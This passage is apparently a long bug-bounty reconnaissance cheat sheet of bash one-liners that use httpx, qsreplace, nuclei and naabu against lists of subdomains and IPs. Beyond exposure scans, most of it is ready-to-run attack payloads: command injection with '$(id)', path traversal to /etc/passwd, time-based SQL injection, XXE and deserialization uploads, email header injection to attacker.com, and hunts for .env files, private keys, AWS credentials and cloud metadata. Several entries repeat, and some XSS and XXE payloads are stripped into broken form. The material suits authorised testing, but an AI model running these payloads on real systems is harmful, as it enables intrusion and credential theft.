1479 | cat subdomains.txt | httpx -silent -path /graphiql -mc 200 -o graphql_console.txt
1480 | ```
1481 |
1482 | ⚠️ **SOAP Service Discovery (Old APIs)**
1483 | ```bash
1484 | cat subdomains.txt | httpx -silent -path /services.wsdl -mc 200 -o soap_services.txt
1485 | ```
1486 |
1487 | 📬 **Email Injection via Contact Forms**
1488 | ```bash
1489 | cat urls.txt | qsreplace 'test%0d%0aBCC:evil@attacker.com' | httpx -silent -fr 'evil@attacker.com' -o email_injection.txt
1490 | ```
1491 |
1492 | 🕵️♂️ **GCP Bucket Enumeration (Public Buckets)**
1493 | ```bash
1494 | cat subdomains.txt | sed 's/$/.storage.googleapis.com/' | httpx -silent -mc 200 -o gcp_buckets.txt
1495 | ```
1496 |
1497 | 🛠️ **Deserialization via File Upload (PHP/JAVA Specific)**
1498 | ```bash
1499 | cat upload_endpoints.txt | xargs -I {} curl -X POST -F 'file=@payload.ser' {} -s -o - | grep 'java.lang' -B 2
1500 | ```
1501 |
1502 | 🔗 **IDOR Detection via Incremental IDs**
1503 | ```bash
1504 | cat urls.txt | qsreplace 'id=123' | anew incremental_ids.txt
1505 | cat incremental_ids.txt | qsreplace 'id=124' | httpx -silent -fr 'profile' -o idor_found.txt
1506 | ```
1507 |
1508 | **Azure Blob Storage Enumeration**
1509 | ```bash
1510 | cat subdomains.txt | sed 's/$/.blob.core.windows.net/' | httpx -silent -mc 200 -o azure_blobs.txt
1511 | ```
1512 |
1513 | 🎯 **XXE Injection via File Upload (XML Files)**
1514 | ```bash
1515 | cat upload_endpoints.txt | xargs -I {} curl -X POST -F 'file=@payload.xml' {} -s -o - | grep 'root:' -B 2
1516 | ```
1517 |
1518 | 📊 **Exposed Kibana Dashboards (DevOps)**
1519 | ```bash
1520 | cat subdomains.txt | httpx -silent -path /app/kibana -mc 200 -o exposed_kibana.txt
1521 | ```
1522 |
1523 | **CVE Scanner for Web Targets (Nuclei One-Liner)**
1524 | ```bash
1525 | cat subdomains.txt | nuclei -silent -t cves/ -o found_cves.txt
1526 | ```
1527 |
1528 | 📈 **LFI via Log Poisoning**
1529 | ```bash
1530 | cat urls.txt | qsreplace '../../../../../../../../var/log/nginx/access.log' | httpx -silent -fr 'GET /' -o log_poisoning_lfi.txt
1531 | ```
1532 |
1533 | 🗄️ **Exposed Jenkins Console (DevOps)**
1534 | ```bash
1535 | cat subdomains.txt | httpx -silent -path /script -mc 200 -o exposed_jenkins.txt
1536 | ```
1537 |
1538 | 📂 Exposed Git Directories (Sensitive Files in .git)
1539 | ```bash
1540 | cat subdomains.txt | httpx -silent -path /.git/config -mc 200 -o exposed_git.txt
1541 | ```
1542 |
1543 | 🔥 Open Kibana (Cloud Misconfiguration)
1544 | ```bash
1545 | cat subdomains.txt | httpx -silent -path /app/kibana -mc 200 -o open_kibana.txt
1546 | ```
1547 |
1548 | 📤 Exposed Env Files (Secrets Disclosure)
1549 | ```bash
1550 | cat subdomains.txt | httpx -silent -path /.env -mc 200 -o exposed_env.txt
1551 | ```
1552 |
1553 | 🗂️ Directory Listing Enabled (Info Disclosure)
1554 | ```bash
1555 | cat subdomains.txt | httpx -silent -path / -fr 'Index of /' -o dir_listing.txt
1556 | ```
1557 |
1558 | 💉 Command Injection via Input Parameters
1559 | ```bash
1560 | cat urls.txt | qsreplace '$(id)' | httpx -silent -fr 'uid=' -o command_injection.txt
1561 | ```
1562 |
1563 | 🪄 CORS Misconfiguration Check (Origin Reflection)
1564 | ```bash
1565 | cat urls.txt | httpx -silent -H 'Origin: https://evil.com' -fr 'https://evil.com' -o cors_misconfig.txt
1566 | ```
1567 |
1568 | 🔗 Open Redirect (URL Parameter Test)
1569 | ```bash
1570 | cat urls.txt | qsreplace 'https://evil.com' | httpx -silent -fr 'evil.com' -o open_redirect.txt
1571 | ```
1572 |
1573 | Backup/Old Files Exposure
1574 | ```bash
1575 | cat subdomains.txt | httpx -silent -path-list <(echo -e '/index.php~\n/config.old\n/database.bak') -mc 200 -o exposed_backup_files.txt
1576 | ```
1577 |
1578 | 🕵️ Clickjacking (Missing X-Frame-Options)
1579 | ```bash
1580 | cat subdomains.txt | httpx -silent -hx -o headers.txt
1581 | cat headers.txt | grep -E "x-frame-options|X-Frame-Options" -i -L > clickjacking_vulnerable.txt
1582 | ```
1583 |
1584 | ⚙️ Misconfigured Jenkins Instances
1585 | ```bash
1586 | cat subdomains.txt | httpx -silent -path /script -mc 200 -o exposed_jenkins.txt
1587 | ```
1588 |
1589 | 💾 Open MongoDB Instances (Cloud Exposure)
1590 | ```bash
1591 | cat ips.txt | xargs -I{} sh -c 'echo {} && mongosh --host {} --eval "db.stats()"' 2>/dev/null | tee open_mongodb.txt
1592 | ```
1593 |
1594 | Exposed Private Keys (Accidental Disclosure)
1595 | ```bash
1596 | cat subdomains.txt | httpx -silent -path-list <(echo -e '/id_rsa\n/keys/privkey.pem\n/.ssh/id_rsa') -mc 200 -o exposed_keys.txt
1597 | ```
1598 |
1599 | Insecure JSONP Endpoints (Callback Hijacking)
1600 | ```bash
1601 | cat urls.txt | qsreplace 'callback=alert(document.domain)' | httpx -silent -fr 'alert(document.domain)' -o jsonp_vulns.txt
1602 | ```
1603 |
1604 | Exposed phpinfo() Files (Info Disclosure)
1605 | ```bash
1606 | cat subdomains.txt | httpx -silent -path /phpinfo.php -mc 200 -o exposed_phpinfo.txt
1607 | ```
1608 |
1609 | RCE via Deserialization (Java/PHP Payloads)
1610 | ```bash
1611 | cat upload_urls.txt | xargs -I{} curl -X POST -F 'file=@payload.ser' {} -s | grep 'java.lang.Runtime' -o rce_found.txt
1612 | ```
1613 |
1614 | LFI via Log Files
1615 | ```bash
1616 | cat urls.txt | qsreplace '../../../../../../../../var/log/nginx/access.log' | httpx -silent -fr 'GET /' -o log_lfi.txt
1617 | ```
1618 |
1619 | Exposed Docker APIs (DevOps Misconfig)
1620 | ```bash
1621 | cat ips.txt | xargs -I{} curl -s -X GET "http://{}:2375/images/json" | grep 'Id' -B 2 | tee exposed_docker.txt
1622 | ```
1623 |
1624 | Amazon S3 Buckets (Open Buckets)
1625 | ```bash
1626 | cat subdomains.txt | sed 's/$/.s3.amazonaws.com/' | httpx -silent -mc 200 -o open_s3_buckets.txt
1627 | ```
1628 |
1629 | Open Elasticsearch (DevOps Exposure)
1630 | ```bash
1631 | cat ips.txt | xargs -I{} curl -s "http://{}:9200/_cat/indices?v" | grep -v 'master' | tee open_elasticsearch.txt
1632 | ```
1633 |
1634 | Backup Files in Web Root
1635 | ```bash
1636 | cat urls.txt | sed 's/$/.bak/' | httpx -silent -mc 200 -o found_backups.txt
1637 | ```
1638 |
1639 | XSS in reflected parameters (quick check)
1640 | ```bash
1641 | cat urls.txt | qsreplace '' | httpx -silent -fr '' -o xss_reflected.txt
1642 | ```
1643 |
1644 | SQL Injection (time-based detection)
1645 | ```bash
1646 | cat urls.txt | qsreplace "' AND SLEEP(5)--" | httpx -silent -rt -o sqli_time_based.txt
1647 | ```
1648 |
1649 | Detect exposed Git repositories (.git folder)
1650 | ```bash
1651 | cat subdomains.txt | httpx -silent -path /.git/HEAD -mc 200 -o exposed_git_repos.txt
1652 | ```
1653 |
1654 | Find Local File Inclusion (LFI)
1655 | ```bash
1656 | cat urls.txt | qsreplace '../../../../../../../../etc/passwd' | httpx -silent -fr 'root:x:' -o lfi_found.txt
1657 | ```
1658 |
1659 | Open Directory Listing
1660 | ```bash
1661 | cat subdomains.txt | httpx -silent -mc 200 -fr 'Index of' -o open_directory_listing.txt
1662 | ```
1663 |
1664 | Find Open Kibana Dashboards (Internal Leaks)
1665 | ```bash
1666 | cat subdomains.txt | httpx -silent -path /app/kibana -mc 200 -o open_kibana.txt
1667 | ```
1668 |
1669 | Subdomain Takeover (Check NXDOMAIN)
1670 | ```bash
1671 | subfinder -d target.com | httpx -silent -sc -o subs_status.txt
1672 | cat subs_status.txt | grep 'NXDOMAIN' > takeover_candidates.txt
1673 | ```
1674 |
1675 | Test for Host Header Injection
1676 | ```bash
1677 | cat urls.txt | httpx -silent -H "Host: evil.com" -fr 'evil.com' -o host_header_injection.txt
1678 | ```
1679 |
1680 | Exposed Config Files
1681 | ```bash
1682 | cat subdomains.txt | httpx -silent -path-list <(echo -e '/config.php\n/settings.py\n/.env\n/config.json') -mc 200 -o exposed_configs.txt
1683 | ```
1684 |
1685 | Detecting Exposed Admin Panels
1686 | ```bash
1687 | cat subdomains.txt | httpx -silent -path-list <(echo -e '/admin\n/wp-admin\n/console\n/dashboard') -mc 200 -o admin_panels.txt
1688 | ```
1689 |
1690 | Command Injection Test
1691 | ```bash
1692 | cat urls.txt | qsreplace '$(id)' | httpx -silent -fr 'uid=' -o command_injection.txt
1693 | ```
1694 |
1695 | Check for Backup Files (Old Configs)
1696 | ```bash
1697 | cat subdomains.txt | httpx -silent -path-list <(echo -e '/backup.zip\n/db_backup.sql\n/config.old') -mc 200 -o backup_files_found.txt
1698 | ```
1699 |
1700 | Check for Open Redis Instances
1701 | ```bash
1702 | cat subdomains.txt | httpx -silent -path / -p 6379 -o open_redis_instances.txt
1703 | ```
1704 |
1705 | Test for Open Proxy Misconfiguration
1706 | ```bash
1707 | curl -x http://target.com http://example.com -v
1708 | ```
1709 |
1710 | XXE Injection Test
1711 | ```bash
1712 | cat urls.txt | qsreplace ']>&xxe;' | httpx -silent -fr 'root:x:' -o xxe_found.txt
1713 | ```
1714 |
1715 | Detect JWT Tokens in Response
1716 | ```bash
1717 | cat urls.txt | httpx -silent -fr 'eyJ' -o jwt_leaks.txt
1718 | ```
1719 |
1720 | Server Version Disclosure (Fingerprinting)
1721 | ```bash
1722 | cat subdomains.txt | httpx -silent -server -o server_versions.txt
1723 | ```
1724 |
1725 | Test PUT Method for File Upload
1726 | ```bash
1727 | cat subdomains.txt | httpx -silent -method PUT -path '/test.txt' -body 'test upload' -mc 201,200 -o put_upload_possible.txt
1728 | ```
1729 |
1730 | Check for Debug Endpoints
1731 | ```bash
1732 | cat subdomains.txt | httpx -silent -path /debug -mc 200 -o debug_endpoints.txt
1733 | ```
1734 |
1735 | Find Content Security Policy Bypass (Open Wildcards)
1736 | ```bash
1737 | cat subdomains.txt | httpx -silent -hx | grep 'Content-Security-Policy' | grep '*'
1738 | ```
1739 |
1740 | Check for Public .DS_Store Files (Directory Listing)
1741 | ```bash
1742 | cat subdomains.txt | httpx -silent -path /.DS_Store -mc 200 -o ds_store_leaks.txt
1743 | ```
1744 |
1745 | Find Open Jenkins Panels
1746 | ```bash
1747 | cat subdomains.txt | httpx -silent -path /jenkins -mc 200 -o open_jenkins.txt
1748 | ```
1749 |
1750 | Detect Internal IP Leaks in Response
1751 | ```bash
1752 | cat urls.txt | httpx -silent -fr '10.' -o internal_ip_leak.txt
1753 | ```
1754 |
1755 | Search for Open API Documentation (Swagger)
1756 | ```bash
1757 | cat subdomains.txt | httpx -silent -path-list <(echo -e '/swagger-ui.html\n/api-docs\n/openapi.json') -mc 200 -o open_api_docs.txt
1758 | ```
1759 |
1760 | Find Exposed .env Files (Sensitive Configs)
1761 | ```bash
1762 | cat subdomains.txt | httpx -silent -path /.env -mc 200 -o exposed_env.txt
1763 | ```
1764 |
1765 | Detect Exposed MySQL Dumps
1766 | ```bash
1767 | cat subdomains.txt | httpx -silent -path /db.sql -mc 200 -o mysql_dumps.txt
1768 | ```
1769 |
1770 | Check for Misconfigured CORS (Allow-All)
1771 | ```bash
1772 | cat urls.txt | httpx -silent -H 'Origin: https://evil.com' -fr 'Access-Control-Allow-Origin: https://evil.com' -o cors_misconfig.txt
1773 | ```
1774 |
1775 | Find Exposed Adminer (DB Management Interface)
1776 | ```bash
1777 | cat subdomains.txt | httpx -silent -path /adminer.php -mc 200 -o exposed_adminer.txt
1778 | ```
1779 |
1780 | Search for Exposed Backup Files (.bak)
1781 | ```bash
1782 | cat subdomains.txt | httpx -silent -path-list <(echo -e '/index.php.bak\n/config.bak\n/db.bak') -mc 200 -o backup_files.txt
1783 | ```
1784 |
1785 | Search for Test/Dev Subdomains (Staging)
1786 | ```bash
1787 | subfinder -d target.com | grep -Ei 'dev|test|staging|qa' > staging_subdomains.txt
1788 | ```
1789 |
1790 | Detect Open RDP Servers (Network Exposures)
1791 | ```bash
1792 | cat ips.txt | naabu -p 3389 -silent -o open_rdp.txt
1793 | ```
1794 |
1795 | Detect AWS S3 Buckets via Subdomains
1796 | ```bash
1797 | cat subdomains.txt | grep -E 's3.amazonaws.com|amazonaws' > s3_buckets.txt
1798 | ```
1799 |
1800 | Identify Weak Security Headers (Lack of CSP, HSTS)
1801 | ```bash
1802 | cat urls.txt | httpx -silent -hx | grep -v -E 'Strict-Transport-Security|Content-Security-Policy' > weak_headers.txt
1803 | ```
1804 |
1805 | Check for Exposed Docker API
1806 | ```bash
1807 | cat ips.txt | naabu -p 2375 -silent -o open_docker_api.txt
1808 | ```
1809 |
1810 | Find Open Grafana Dashboards
1811 | ```bash
1812 | cat subdomains.txt | httpx -silent -path /login -mc 200 -fr 'Grafana' -o open_grafana.txt
1813 | ```
1814 |
1815 | Check for Public PHP Info Pages (Leaking Config)
1816 | ```bash
1817 | cat urls.txt | httpx -silent -path /phpinfo.php -mc 200 -o phpinfo_exposed.txt
1818 | ```
1819 |
1820 | Find Exposed Laravel Debug Panels
1821 | ```bash
1822 | cat subdomains.txt | httpx -silent -path /_debugbar -mc 200 -o laravel_debug.txt
1823 | ```
1824 |
1825 | Look for Open ElasticSearch (Data Exposure)
1826 | ```bash
1827 | cat ips.txt | naabu -p 9200 -silent -o open_elasticsearch.txt
1828 | ```
1829 |
1830 | Identify Directory Traversal (Simple Payload)
1831 | ```bash
1832 | cat urls.txt | qsreplace '../../../../../etc/passwd' | httpx -silent -fr 'root:x:' -o directory_traversal.txt
1833 | ```
1834 |
1835 | Find Open Kibana Dashboards (Sensitive Logs)
1836 | ```bash
1837 | cat subdomains.txt | httpx -silent -path /app/kibana -mc 200 -o open_kibana.txt
1838 | ```
1839 |
1840 | Detect Exposed Wordpress Debug Logs
1841 | ```bash
1842 | cat subdomains.txt | httpx -silent -path /wp-content/debug.log -mc 200 -o wp_debug_logs.txt
1843 | ```
1844 |
1845 | Find Exposed FTP Servers (Anonymous Access)
1846 | ```bash
1847 | cat ips.txt | naabu -p 21 -silent -o open_ftp.txt
1848 | ```
1849 |
1850 | Detect Open MongoDB Databases (No Auth)
1851 | ```bash
1852 | cat ips.txt | naabu -p 27017 -silent -o open_mongo.txt
1853 | ```
1854 |
1855 | Identify Open PhpMyAdmin Panels
1856 | ```bash
1857 | cat subdomains.txt | httpx -silent -path /phpmyadmin -mc 200 -o open_phpmyadmin.txt
1858 | ```
1859 |
1860 | Search for Backup Files with Extensions (.bak, .old)
1861 | ```bash
1862 | cat subdomains.txt | gauplus | grep -E '\.bak|\.old|\.backup' > backup_files_found.txt
1863 | ```
1864 |
1865 | Check for Open Directories (Index of Listings)
1866 | ```bash
1867 | cat subdomains.txt | httpx -silent -mc 200 -fr 'Index of /' -o open_directories.txt
1868 | ```
1869 |
1870 | Find Public GraphQL Endpoints (API Leaks)
1871 | ```bash
1872 | cat subdomains.txt | httpx -silent -path /graphql -mc 200 -o open_graphql.txt
1873 | ```
1874 |
1875 | Identify Misconfigured AWS Bucket via Headers
1876 | ```bash
1877 | cat urls.txt | httpx -silent -hx | grep -i 'x-amz' > aws_bucket_leaks.txt
1878 | ```
1879 |
1880 | Check for Publicly Accessible Jenkins Script Console
1881 | ```bash
1882 | cat subdomains.txt | httpx -silent -path /script -mc 200 -o jenkins_script_console.txt
1883 | ```
1884 |
1885 | Check for Exposed SVN Files
1886 | ```bash
1887 | cat subdomains.txt | httpx -silent -path /.svn/entries -mc 200 -o svn_leaks.txt
1888 | ```
1889 |
1890 | Find Publicly Exposed Config.json Files
1891 | ```bash
1892 | cat subdomains.txt | httpx -silent -path /config.json -mc 200 -o config_json_exposed.txt
1893 | ```
1894 |
1895 | Identify Unauthenticated Redis Servers
1896 | ```bash
1897 | cat ips.txt | naabu -p 6379 -silent -o open_redis.txt
1898 | ```
1899 |
1900 | Detect Exposed Private Keys in URLs
1901 | ```bash
1902 | cat urls.txt | grep -Ei 'private_key|id_rsa|pem' > private_key_leaks.txt
1903 | ```
1904 |
1905 | Search for Open API Keys in URLs
1906 | ```bash
1907 | cat urls.txt | grep -Ei 'apikey|api_key|token' > exposed_api_keys.txt
1908 | ```
1909 |
1910 | Detect Exposed .bash_history Files
1911 | ```bash
1912 | cat subdomains.txt | httpx -silent -path /.bash_history -mc 200 -o bash_history_exposed.txt
1913 | ```
1914 |
1915 | Check for Open etc/passwd via LFI
1916 | ```bash
1917 | cat urls.txt | qsreplace '../../../../../etc/passwd' | httpx -silent -fr 'root:x:' -o lfi_passwd.txt
1918 | ```
1919 |
1920 | Find Open Exposed Backup ZIP Files
1921 | ```bash
1922 | cat subdomains.txt | httpx -silent -path-list <(echo -e '/backup.zip\n/site_backup.zip\n/db_backup.zip') -mc 200 -o backup_zip_exposed.txt
1923 | ```
1924 |
1925 | Detect Exposed Logs (server.log, error.log)
1926 | ```bash
1927 | cat subdomains.txt | httpx -silent -path-list <(echo -e '/server.log\n/error.log\n/application.log') -mc 200 -o exposed_logs.txt
1928 | ```
1929 |
1930 | Find Publicly Accessible Admin Panels (General)
1931 | ```bash
1932 | cat subdomains.txt | httpx -silent -path-list <(echo -e '/admin\n/administrator\n/admin/login\n/admin.php\n/adminer.php') -mc 200 -o open_admin_panels.txt
1933 | ```
1934 |
1935 | Detect Exposed YAML Config Files
1936 | ```bash
1937 | cat subdomains.txt | httpx -silent -path-list <(echo -e '/config.yaml\n/application.yaml') -mc 200 -o exposed_yaml.txt
1938 | ```
1939 |
1940 | Check for Directory Traversal to Windows Files
1941 | ```bash
1942 | cat urls.txt | qsreplace 'C:\Windows\win.ini' | httpx -silent -fr 'for 16-bit app support' -o windows_lfi.txt
1943 | ```
1944 |
1945 | Find Open Jupyter Notebooks (No Auth)
1946 | ```bash
1947 | cat subdomains.txt | httpx -silent -path /tree -mc 200 -o open_jupyter.txt
1948 | ```
1949 |
1950 | Identify Server Error Pages (500 Errors)
1951 | ```bash
1952 | cat urls.txt | httpx -silent -mc 500 -o server_errors.txt
1953 | ```
1954 |
1955 | Check for Open SNMP Services
1956 | ```bash
1957 | cat ips.txt | naabu -p 161 -silent -o open_snmp.txt
1958 | ```
1959 |
1960 | Find Exposed Laravel Environment Files (.env)
1961 | ```bash
1962 | cat subdomains.txt | httpx -silent -path /.env -mc 200 -o exposed_env_files.txt
1963 | ```
1964 |
1965 | Detect Git Repository Exposures (.git/config)
1966 | ```bash
1967 | cat subdomains.txt | httpx -silent -path /.git/config -mc 200 -o exposed_git_configs.txt
1968 | ```
1969 |
1970 | Look for Exposed Dockerfiles
1971 | ```bash
1972 | cat subdomains.txt | httpx -silent -path /Dockerfile -mc 200 -o exposed_dockerfiles.txt
1973 | ```
1974 |
1975 | Identify Publicly Accessible AWS Credentials
1976 | ```bash
1977 | cat subdomains.txt | httpx -silent -path /aws/credentials -mc 200 -o exposed_aws_credentials.txt
1978 | ```
1979 |
1980 | Search for Backup Database Dumps (SQL, SQLite)
1981 | ```bash
1982 | cat subdomains.txt | httpx -silent -path-list <(echo -e '/db.sql\n/database.sql\n/dump.sql\n/backup.db') -mc 200 -o db_dumps.txt
1983 | ```
1984 |
1985 | Detect Exposed SSL Certificates (pem)
1986 | ```bash
1987 | cat subdomains.txt | httpx -silent -path /ssl/cert.pem -mc 200 -o exposed_ssl.txt
1988 | ```
1989 |
1990 | Find Open Configuration.php Files (Joomla)
1991 | ```bash
1992 | cat subdomains.txt | httpx -silent -path /configuration.php -mc 200 -o joomla_config_exposed.txt
1993 | ```
1994 |
1995 | Hunt for Open Jenkins Dashboards
1996 | ```bash
1997 | cat subdomains.txt | httpx -silent -path /jenkins -mc 200 -o open_jenkins.txt
1998 | ```
1999 |
2000 | Detect Exposed Magento Admin Panels
2001 | ```bash
2002 | cat subdomains.txt | httpx -silent -path /admin -mc 200 -o magento_admin.txt
2003 | ```
2004 |
2005 | Check for Exposed API Documentation (Swagger UI)
2006 | ```bash
2007 | cat subdomains.txt | httpx -silent -path /swagger-ui.html -mc 200 -o swagger_exposed.txt
2008 | ```
2009 |
2010 | Detect GitLab or GitHub Enterprise Instances
2011 | ```bash
2012 | cat subdomains.txt | httpx -silent -path /users/sign_in -mc 200 -o gitlab_or_ghe.txt
2013 | ```
2014 |
2015 | Find Misconfigured CORS (Wildcard)
2016 | ```bash
2017 | cat urls.txt | httpx -silent -H "Origin: https://evil.com" -fr 'Access-Control-Allow-Origin: https://evil.com' -o cors_misconfig.txt
2018 | ```
2019 |
2020 | Scan for Server Status Pages (Apache/Nginx)
2021 | ```bash
2022 | cat subdomains.txt | httpx -silent -path-list <(echo -e '/server-status\n/nginx_status') -mc 200 -o server_status_exposed.txt
2023 | ```
2024 |
2025 | Identify Exposed Debug Pages (PHP Info)
2026 | ```bash
2027 | cat subdomains.txt | httpx -silent -path /phpinfo.php -mc 200 -o phpinfo_exposed.txt
2028 | ```
2029 |
2030 | Detect Open Redis Stats Pages (Unprotected UI)
2031 | ```bash
2032 | cat subdomains.txt | httpx -silent -path /redis -mc 200 -o redis_ui_exposed.txt
2033 | ```
2034 |
2035 | Scan for Exposed Kubernetes Dashboard
2036 | ```bash
2037 | cat subdomains.txt | httpx -silent -path /api/v1/namespaces/kube-system/services/https:kubernetes-dashboard:/proxy/ -mc 200 -o k8s_dashboard_exposed.txt
2038 | ```
2039 |
2040 | Look for GraphQL Playground
2041 | ```bash
2042 | cat subdomains.txt | httpx -silent -path /playground -mc 200 -o graphql_playground_exposed.txt
2043 | ```
2044 |
2045 | Find Exposed OpenAPI Spec Files (openapi.json)
2046 | ```bash
2047 | cat subdomains.txt | httpx -silent -path /openapi.json -mc 200 -o openapi_exposed.txt
2048 | ```
2049 |
2050 | Scan for Exposed GCP Metadata Servers
2051 | ```bash
2052 | cat ips.txt | naabu -p 80,443 -silent | httpx -path /computeMetadata/v1/ -H 'Metadata-Flavor: Google' -mc 200 -o gcp_metadata_exposed.txt
2053 | ```
2054 |
2055 | Find Exposed Jenkins Console Logs
2056 | ```bash
2057 | cat subdomains.txt | httpx -silent -path /console -mc 200 -o jenkins_console_logs.txt
2058 | ```
2059 |
2060 | Check for Open Jira Dashboards (Exposed Tickets)
2061 | ```bash
2062 | cat subdomains.txt | httpx -silent -path /secure/Dashboard.jspa -mc 200 -o jira_exposed.txt
2063 | ```
2064 |
2065 | Detect Exposed Env Variables via /env (SpringBoot)
2066 | ```bash
2067 | cat subdomains.txt | httpx -silent -path /env -mc 200 -o springboot_env_exposed.txt
2068 | ```
2069 |
2070 | Find Misconfigured GitHub Actions Workflows (YAML)
2071 | ```bash
2072 | cat subdomains.txt | gauplus | grep -Ei '.github/workflows/.*\.yml' > github_workflows_exposed.txt
2073 | ```
2074 |
2075 | Scan for Default Admin Credentials on Login Pages
2076 | ```bash
2077 | cat urls.txt | nuclei -t cves/ -tags 'default-login' -o default_creds.txt
2078 | ```
2079 |
2080 | Check for Misconfigured Prometheus Servers
2081 | ```bash
2082 | cat subdomains.txt | httpx -silent -path /graph -mc 200 -o prometheus_exposed.txt
2083 | ```
2084 |
2085 | Find Exposed Backup Files (ZIP, TAR, SQL)
2086 | ```bash
2087 | cat subdomains.txt | httpx -silent -path-list <(echo -e '/backup.zip\n/backup.tar.gz\n/dump.sql') -mc 200 -o exposed_backups.txt
2088 | ```
2089 |
2090 | Detect Exposed Open Directory Listings
2091 | ```bash
2092 | cat subdomains.txt | httpx -silent -fr 'Index of /' -o open_directories.txt
2093 | ```
2094 |
2095 | Find Open Jenkins Script Console (RCE Point)
2096 | ```bash
2097 | cat subdomains.txt | httpx -silent -path /script -mc 200 -o jenkins_script_console.txt
2098 | ```
2099 |
2100 | Scan for Exposed Kubernetes Kubelet APIs (Unauth Access)
2101 | ```bash
2102 | cat ips.txt | httpx -silent -path /pods -mc 200 -o kubelet_exposed.txt
2103 | ```
2104 |
2105 | Look for Apache Struts Vulnerable Endpoints
2106 | ```bash
2107 | cat subdomains.txt | httpx -silent -path /struts2-showcase/index.action -mc 200 -o struts_vuln.txt
2108 | ```
2109 |
2110 | Identify Open Tomcat Manager Consoles
2111 | ```bash
2112 | cat subdomains.txt | httpx -silent -path /manager/html -mc 200 -o tomcat_manager_open.txt
2113 | ```
2114 |
2115 | Detect CVE-2021-3129 (Laravel Debug Mode RCE)
2116 | ```bash
2117 | cat subdomains.txt | httpx -silent -path /_ignition/execute-solution -mc 200 -o laravel_rce.txt
2118 | ```
2119 |
2120 | Find Exposed Config.json / settings.json
2121 | ```bash
2122 | cat subdomains.txt | httpx -silent -path-list <(echo -e '/config.json\n/settings.json') -mc 200 -o exposed_json_configs.txt
2123 | ```
2124 |
2125 | Check for Outdated WordPress (Version Leak)
2126 | ```bash
2127 | cat subdomains.txt | httpx -silent -path /readme.html -mc 200 -o wordpress_version.txt
2128 | ```
2129 |
2130 | Find Exposed Log Files (.log)
2131 | ```bash
2132 | cat subdomains.txt | httpx -silent -path /error.log -mc 200 -o exposed_logs.txt
2133 | ```
2134 |
2135 | Detect Misconfigured GraphQL Endpoints (Introspection Enabled)
2136 | ```bash
2137 | cat subdomains.txt | httpx -silent -path /graphql -H 'Content-Type: application/json' -d '{"query":"query IntrospectionQuery {__schema { queryType { name }}}"}' -o graphql_introspection_enabled.txt
2138 | ```
2139 |
2140 | Scan for Exposed Config.php in WordPress / Joomla
2141 | ```bash
2142 | cat subdomains.txt | httpx -silent -path /wp-config.php -mc 200 -o wp_config_exposed.txt
2143 | ```
2144 |
2145 | Detect Open API Endpoints (via common paths)
2146 | ```bash
2147 | cat subdomains.txt | httpx -silent -path-list <(echo -e '/api/v1/\n/api/\n/api/v2/\n/app_dev.php/api/') -mc 200 -o open_api_endpoints.txt
2148 | ```
2149 |
2150 | Check for Exposed GitHub Personal Access Tokens (PATs)
2151 | ```bash
2152 | cat subdomains.txt | gauplus | grep -E 'token=[a-z0-9]+' > github_tokens_leak.txt
2153 | ```
2154 |
2155 | Find Misconfigured AWS Buckets (S3)
2156 | ```bash
2157 | cat subdomains.txt | httpx -silent -path / -mc 200 -o s3_buckets_exposed.txt
2158 | ```
2159 |
2160 | Scan for Exposed Laravel Log Files
2161 | ```bash
2162 | cat subdomains.txt | httpx -silent -path /storage/logs/laravel.log -mc 200 -o laravel_log_exposed.txt
2163 | ```
2164 |
2165 | Check for Outdated Apache Version via Server Header
2166 | ```bash
2167 | cat subdomains.txt | httpx -silent -fr 'Server: Apache/2.4' -o outdated_apache.txt
2168 | ```
2169 |
2170 | Detect PHPMyAdmin Open Login Pages
2171 | ```bash
2172 | cat subdomains.txt | httpx -silent -path /phpmyadmin -mc 200 -o phpmyadmin_open.txt
2173 | ```
2174 |
2175 | Look for Unprotected Kibana Instances
2176 | ```bash
2177 | cat subdomains.txt | httpx -silent -path /app/kibana -mc 200 -o kibana_open.txt
2178 | ```
2179 |
2180 | Scan for Public Grafana Dashboards
2181 | ```bash
2182 | cat subdomains.txt | httpx -silent -path /login -mc 200 -o grafana_login_open.txt
2183 | ```
2184 |
2185 | Search for Common Backup Extensions (bak, old, save)
2186 | ```bash
2187 | cat subdomains.txt | httpx -silent -path-list <(echo -e '/index.php.bak\n/config.old\n/config.save') -mc 200 -o backup_files_exposed.txt
2188 | ```
2189 |
2190 | Find Misconfigured ElasticSearch Instances (Public Index)
2191 | ```bash
2192 | cat ips.txt | httpx -silent -path /_cat/indices?v -mc 200 -o elasticsearch_exposed.txt
2193 | ```
2194 |
2195 | Look for Exposed Jenkins Build Logs
2196 | ```bash
2197 | cat subdomains.txt | httpx -silent -path /job/test/lastBuild/consoleText -mc 200 -o jenkins_build_logs.txt
2198 | ```
2199 |
2200 | Find Open Adminer DB Management Tools
2201 | ```bash
2202 | cat subdomains.txt | httpx -silent -path /adminer.php -mc 200 -o adminer_exposed.txt
2203 | ```
2204 |
2205 | Detect Exposed SVN Directories
2206 | ```bash
2207 | cat subdomains.txt | httpx -silent -path /.svn/entries -mc 200 -o svn_exposed.txt
2208 | ```
2209 |
2210 | Detect Exposed .git Repos (Source Code Leak)
2211 | ```bash
2212 | cat subdomains.txt | httpx -silent -path /.git/config -mc 200 -o git_exposed.txt
2213 | ```
2214 |
2215 | Find Sensitive Files using common patterns (env, db creds, ssh keys)
2216 | ```bash
2217 | cat subdomains.txt | httpx -silent -path-list <(echo -e '/.env\n/database.yml\n/id_rsa\n/config.php\n/secrets.yml') -mc 200 -o sensitive_files.txt
2218 | ```
2219 |
2220 | Detect Exposed Docker and Kubernetes Dashboard
2221 | ```bash
2222 | cat subdomains.txt | httpx -silent -path-list <(echo -e '/api/v1/namespaces/kube-system/services/https:kubernetes-dashboard:/proxy\n/docker') -mc 200 -o kube_docker_exposed.txt
2223 | ```
2224 |
2225 | Scan for Exposed Environment Variables in Responses
2226 | ```bash
2227 | cat subdomains.txt | httpx -silent -fr 'AWS_ACCESS_KEY_ID|SECRET_KEY|DB_PASSWORD' -o secrets_in_response.txt
2228 | ```
2229 |
2230 | Find Public Swagger API Documentation (API Discovery)
2231 | ```bash
2232 | cat subdomains.txt | httpx -silent -path /swagger.json -mc 200 -o swagger_exposed.txt
2233 | ```
2234 |
2235 | Check for Exposed Server-Status Pages (Apache/Nginx Debug Info)
2236 | ```bash
2237 | cat subdomains.txt | httpx -silent -path /server-status -mc 200 -o server_status_exposed.txt
2238 | ```
2239 |
2240 | Scan for Open Redis, Memcached, MongoDB Ports (Unauth Access)
2241 | ```bash
2242 | naabu -list subdomains.txt -ports 6379,11211,27017 -silent -o open_db_ports.txt
2243 | ```
2244 |
